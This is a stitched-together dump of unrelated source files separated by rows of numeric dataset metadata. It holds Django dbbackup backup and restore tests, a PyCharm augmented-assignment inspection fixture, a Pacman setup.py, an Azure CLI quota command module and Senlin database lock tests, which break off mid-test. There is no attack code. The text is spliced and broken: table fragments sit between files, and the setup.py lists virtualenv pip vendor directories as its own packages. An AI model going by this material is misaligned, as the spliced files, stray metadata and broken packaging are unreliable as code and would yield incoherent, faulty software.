self.assertTrue(restored)
def test_compressed(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup', '--compress'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore', '--uncompress'])
def test_no_backup_available(self, *args):
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore'])
@patch('dbbackup.utils.getpass', return_value=None)
def test_available_but_not_encrypted(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
# Restore
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore', '--decrypt'])
def test_available_but_not_compressed(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
# Restore
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore', '--uncompress'])
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
class MediaBackupCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
def tearDown(self):
clean_gpg_keys()
def test_encrypt(self):
argv = ['', 'mediabackup', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue('.gpg' in filename)
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
def test_no_compress(self):
argv = ['', 'mediabackup', '--no-compress']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertFalse('.gz' in filename)
@patch('dbbackup.utils.getpass', return_value=None)
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
def test_no_compress_and_encrypted(self, getpass_mock, confirm_mock):
argv = ['', 'mediabackup', '--no-compress', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue('.gpg' in filename)
self.assertFalse('.gz' in filename)
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
# def test_available_but_not_compressed(self, *args):
# # Create backup
# execute_from_command_line(['', 'dbbackup'])
# # Restore
# with self.assertRaises(Exception):
# execute_from_command_line(['', 'dbrestore', '--uncompress'])
| 39.08589
| 85
| 0.645895
| 689
| 6,371
| 5.738752
| 0.155298
| 0.05564
| 0.091047
| 0.11128
| 0.858118
| 0.844208
| 0.816388
| 0.806272
| 0.792109
| 0.638088
| 0
| 0.004785
| 0.212682
| 6,371
| 162
| 86
| 39.32716
| 0.783493
| 0.066081
| 0
| 0.717949
| 0
| 0
| 0.171925
| 0.04876
| 0
| 0
| 0
| 0
| 0.188034
| 1
| 0.153846
| false
| 0.034188
| 0.042735
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab2a26b03a2fe852eacb1d314e1bf98193fe68c3
| 513
|
py
|
Python
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# PY-2488
<weak_warning descr="Assignment can be replaced with augmented assignment">a = a ** 1</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x % 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x | 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x & 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x ^ 3</weak_warning>
| 57
| 100
| 0.77193
| 77
| 513
| 5.012987
| 0.194805
| 0.284974
| 0.207254
| 0.336788
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0
| 0.020045
| 0.124756
| 513
| 8
| 101
| 64.125
| 0.839644
| 0.013645
| 0
| 0
| 0
| 0
| 0.516899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ab41312a18a7bd0228e5db20d48130827db7562b
| 200
|
py
|
Python
|
facilyst/graphs/utils.py
|
ParthivNaresh/Facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | null | null | null |
facilyst/graphs/utils.py
|
ParthivNaresh/Facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | 3
|
2022-02-26T17:19:28.000Z
|
2022-03-01T09:34:19.000Z
|
facilyst/graphs/utils.py
|
ParthivNaresh/facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | null | null | null |
"""Utility functions for all graphs."""
from facilyst.graphs import GraphBase
from facilyst.utils.gen_utils import _get_subclasses
def _all_graph_data_types():
return _get_subclasses(GraphBase)
| 25
| 52
| 0.81
| 27
| 200
| 5.666667
| 0.666667
| 0.156863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115
| 200
| 7
| 53
| 28.571429
| 0.864407
| 0.165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ab4c45b0271d5f557bd0c778aa28b41392adc6e3
| 3,658
|
py
|
Python
|
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | 1
|
2020-07-21T02:17:58.000Z
|
2020-07-21T02:17:58.000Z
|
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | null | null | null |
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | 1
|
2021-07-13T21:21:46.000Z
|
2021-07-13T21:21:46.000Z
|
from setuptools import setup
setup(
name='Pacman',
version='1.1',
packages=['venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.idna',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pep517',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pytoml',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.certifi',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.chardet',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.chardet.cli',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.distlib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.msgpack',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.util',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.contrib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.contrib._securetransport',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages.backports',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.colorama',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treebuilders',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.lockfile',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.progress',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.requests',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.packaging',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.webencodings',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.cli',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.req',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.vcs',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.utils',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.models',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.commands',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.operations'],
url='',
license='',
author='TheNerds',
author_email='',
description=''
)
| 69.018868
| 108
| 0.631219
| 608
| 3,658
| 3.720395
| 0.108553
| 0.126879
| 0.199381
| 0.344386
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0
| 0.087679
| 0.176873
| 3,658
| 52
| 109
| 70.346154
| 0.663567
| 0
| 0
| 0
| 0
| 0.803922
| 0.756698
| 0.75205
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.019608
| 0
| 0.019608
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ab57de8f68240788175d6f1b17be74b7baf0f3af
| 4,518
|
py
|
Python
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 1
|
2022-01-25T07:33:18.000Z
|
2022-01-25T07:33:18.000Z
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 9
|
2022-03-25T19:35:49.000Z
|
2022-03-31T06:09:47.000Z
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 1
|
2022-03-10T22:13:02.000Z
|
2022-03-10T22:13:02.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.util import CLIError
from azure.cli.core.util import sdk_no_wait
def quota_usage_list(client,
scope):
return client.list(scope=scope)
def quota_usage_show(client,
resource_name,
scope):
return client.get(resource_name=resource_name,
scope=scope)
def quota_list(client,
scope):
return client.list(scope=scope)
def quota_show(client,
resource_name,
scope):
return client.get(resource_name=resource_name,
scope=scope)
def quota_create(client,
resource_name,
scope,
limit_object=None,
resource_type=None,
properties=None,
no_wait=False):
all_limit = []
if limit_object is not None:
all_limit.append(limit_object)
if len(all_limit) > 1:
raise CLIError('at most one of limit object is needed for limit!')
limit = all_limit[0] if len(all_limit) == 1 else None
create_quota_request = {}
create_quota_request['properties'] = {}
create_quota_request['properties']['limit'] = {}
if limit is not None:
create_quota_request['properties']['limit'] = limit
if properties is not None:
create_quota_request['properties']['properties'] = properties
create_quota_request['properties']['name'] = {}
if resource_name is not None:
create_quota_request['properties']['name']['value'] = resource_name
if len(create_quota_request['properties']['name']) == 0:
del create_quota_request['properties']['name']
if resource_type is not None:
create_quota_request['properties']['resource_type'] = resource_type
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_name=resource_name,
scope=scope,
create_quota_request=create_quota_request)
def quota_update(client,
resource_name,
scope,
limit_object=None,
resource_type=None,
properties=None,
no_wait=False):
all_limit = []
if limit_object is not None:
all_limit.append(limit_object)
if len(all_limit) > 1:
raise CLIError('at most one of limit object is needed for limit!')
limit = all_limit[0] if len(all_limit) == 1 else None
create_quota_request = {}
create_quota_request['properties'] = {}
create_quota_request['properties']['limit'] = {}
if limit is not None:
create_quota_request['properties']['limit'] = limit
if properties is not None:
create_quota_request['properties']['properties'] = properties
create_quota_request['properties']['name'] = {}
if resource_name is not None:
create_quota_request['properties']['name']['value'] = resource_name
if len(create_quota_request['properties']['name']) == 0:
del create_quota_request['properties']['name']
if resource_type is not None:
create_quota_request['properties']['resource_type'] = resource_type
return sdk_no_wait(no_wait,
client.begin_update,
resource_name=resource_name,
scope=scope,
create_quota_request=create_quota_request)
def quota_request_status_list(client,
scope,
filter=None,
top=None,
skip_token=None):
return client.list(scope=scope,
filter=filter,
top=top,
skiptoken=skip_token)
def quota_request_status_show(client,
name,
scope):
return client.get(id=name,
scope=scope)
def quota_operation_list(client):
return client.list()
| 35.296875
| 76
| 0.573484
| 490
| 4,518
| 5.042857
| 0.197959
| 0.126265
| 0.174828
| 0.203966
| 0.788345
| 0.759207
| 0.759207
| 0.759207
| 0.759207
| 0.759207
| 0
| 0.002557
| 0.307437
| 4,518
| 127
| 77
| 35.574803
| 0.787152
| 0.104028
| 0
| 0.765306
| 0
| 0
| 0.095616
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091837
| false
| 0
| 0.020408
| 0.071429
| 0.204082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db912081fb1e33730a3938570edc207b8ad95702
| 20,889
|
py
|
Python
|
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from senlin.db.sqlalchemy import api as db_api
from senlin.tests.unit.common import base
from senlin.tests.unit.common import utils
from senlin.tests.unit.db import shared
UUID1 = shared.UUID1
UUID2 = shared.UUID2
UUID3 = shared.UUID3
class DBAPILockTest(base.SenlinTestCase):
def setUp(self):
super(DBAPILockTest, self).setUp()
self.ctx = utils.dummy_context()
self.profile = shared.create_profile(self.ctx)
self.cluster = shared.create_cluster(self.ctx, self.profile)
self.node = shared.create_node(self.ctx, self.cluster, self.profile)
def test_cluster_lock_cluster_scope(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
def test_cluster_lock_node_scope(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, 1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertEqual(2, len(observed))
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertFalse(observed)
def test_cluster_lock_cluster_lock_first(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertTrue(observed)
def test_cluster_lock_node_lock_first(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, 1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertNotIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertTrue(observed)
def test_cluster_lock_steal(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID2)
self.assertNotIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID3, observed)
self.assertNotIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
def test_node_lock_acquire_release(self):
observed = db_api.node_lock_acquire(self.node.id, UUID1)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertFalse(observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertTrue(observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertFalse(observed)
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertTrue(observed)
def test_node_lock_steal(self):
    """Stealing a node lock transfers ownership regardless of the holder."""
    # Stealing an unheld lock simply grants it.
    owner = db_api.node_lock_steal(self.node.id, UUID1)
    self.assertEqual(UUID1, owner)
    # Normal acquire still reports the (stolen-to) holder.
    owner = db_api.node_lock_acquire(self.node.id, UUID2)
    self.assertEqual(UUID1, owner)
    # Release semantics are unchanged after a steal.
    self.assertFalse(db_api.node_lock_release(self.node.id, UUID2))
    self.assertTrue(db_api.node_lock_release(self.node.id, UUID1))
    # Steal over a live holder hands the lock to the thief.
    owner = db_api.node_lock_acquire(self.node.id, UUID1)
    self.assertEqual(UUID1, owner)
    owner = db_api.node_lock_steal(self.node.id, UUID2)
    self.assertEqual(UUID2, owner)
    # The evicted holder can no longer release it.
    self.assertFalse(db_api.node_lock_release(self.node.id, UUID1))
    self.assertTrue(db_api.node_lock_release(self.node.id, UUID2))
class GCByEngineTest(base.SenlinTestCase):
    """Tests for db_api.gc_by_engine: locks held by a dead engine's actions
    must be released and those actions marked FAILED."""

    def setUp(self):
        super(GCByEngineTest, self).setUp()
        self.ctx = utils.dummy_context()
        self.profile = shared.create_profile(self.ctx)
        self.cluster = shared.create_cluster(self.ctx, self.profile)
        self.node = shared.create_node(self.ctx, self.cluster, self.profile)

    def test_delete_cluster_lock(self):
        # Test the case that a single cluster-scope lock can be released
        #
        # (dead-engine) --> Action --> ClusterLock
        #                   |action|owner|  |cluster|action|scope|
        #                   | A1   | E1  |  |C1     |[A1]  |-1   |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.cluster.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, -1)
        # do it
        db_api.gc_by_engine(engine_id)
        # assertion: the exclusive lock was released, so a new exclusive
        # acquire succeeds and the dead action's lock entry is gone.
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
        self.assertIn(UUID2, observed)
        self.assertNotIn(action.id, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)

    def test_delete_cluster_lock_and_node_lock_1(self):
        # Test the case that an action is about a node that also locked a
        # cluster and the cluster lock can be released
        #
        # (dead-engine) --> Action --> NodeLock
        #                   |action|owner|  |node |action|
        #                   | A1   | E1  |  |N1   |A1    |
        #                          --> ClusterLock
        #                              |cluster|action|scope|
        #                              |C1     |[A1]  |1    |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.node.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
        # BUG FIX: the node lock must be taken on the node's id (was
        # self.cluster.id), otherwise the assertion below never exercised
        # the lock that gc_by_engine is expected to release.
        db_api.node_lock_acquire(self.node.id, action.id)
        # do it
        db_api.gc_by_engine(engine_id)
        # assertion
        # even a read lock is okay now
        # BUG FIX: the cluster lock lives under the cluster's id (was
        # self.node.id, which trivially succeeded on a fresh lock row).
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
        self.assertIn(UUID2, observed)
        self.assertNotIn(action.id, observed)
        # node can be locked again
        observed = db_api.node_lock_acquire(self.node.id, UUID2)
        self.assertEqual(UUID2, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)

    def test_delete_cluster_lock_and_node_lock_2(self):
        # Test the case that an action is about a node that also locked a
        # cluster and the cluster lock will remain locked
        #
        # (dead-engine) --> Action --> NodeLock
        #                   |action|owner|  |node |action|
        #                   | A1   | E1  |  |N1   |A1    |
        #                          --> ClusterLock
        #                              |cluster|action  |scope|
        #                              |C1     |[A1, A2]|2    |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.node.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
        db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
        db_api.node_lock_acquire(self.node.id, action.id)
        # do it
        db_api.gc_by_engine(engine_id)
        # assertion
        # a read lock is okay now and cluster lock state not broken:
        # UUID2's share survives, the dead action's share is gone.
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
        self.assertIn(UUID2, observed)
        self.assertIn(UUID3, observed)
        self.assertNotIn(action.id, observed)
        # node can be locked again
        observed = db_api.node_lock_acquire(self.node.id, UUID2)
        self.assertEqual(UUID2, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)
class DummyGCByEngineTest(base.SenlinTestCase):
    """Tests for db_api.dummy_gc: same contract as gc_by_engine — release
    locks held by a dead engine's actions and mark those actions FAILED."""

    def setUp(self):
        super(DummyGCByEngineTest, self).setUp()
        self.ctx = utils.dummy_context()
        self.profile = shared.create_profile(self.ctx)
        self.cluster = shared.create_cluster(self.ctx, self.profile)
        self.node = shared.create_node(self.ctx, self.cluster, self.profile)

    def test_delete_cluster_lock(self):
        # Test the case that a single cluster-scope lock can be released
        #
        # (dead-engine) --> Action --> ClusterLock
        #                   |action|owner|  |cluster|action|scope|
        #                   | A1   | E1  |  |C1     |[A1]  |-1   |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.cluster.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, -1)
        # do it
        db_api.dummy_gc(engine_id)
        # assertion
        observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
        self.assertIn(UUID2, observed)
        self.assertNotIn(action.id, observed)
        new_action = db_api.action_get(self.ctx, action.id)
        self.assertEqual('FAILED', new_action.status)
        self.assertEqual("Engine failure", new_action.status_reason)

    def test_delete_cluster_lock_and_node_lock_1(self):
        # Test the case that an action is about a node that also locked a
        # cluster and the cluster lock can be released
        #
        # (dead-engine) --> Action --> NodeLock
        #                   |action|owner|  |node |action|
        #                   | A1   | E1  |  |N1   |A1    |
        #                          --> ClusterLock
        #                              |cluster|action|scope|
        #                              |C1     |[A1]  |1    |
        # preparation
        engine_id = UUID1
        action = shared.create_action(self.ctx, target=self.node.id,
                                      status='RUNNING', owner=engine_id,
                                      project=self.ctx.project_id)
        db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
        # BUG FIX: node lock belongs on the node id (was self.cluster.id).
        db_api.node_lock_acquire(self.node.id, action.id)
        # do it
        db_api.dummy_gc(engine_id)
        # assertion
        # even a read lock is okay now
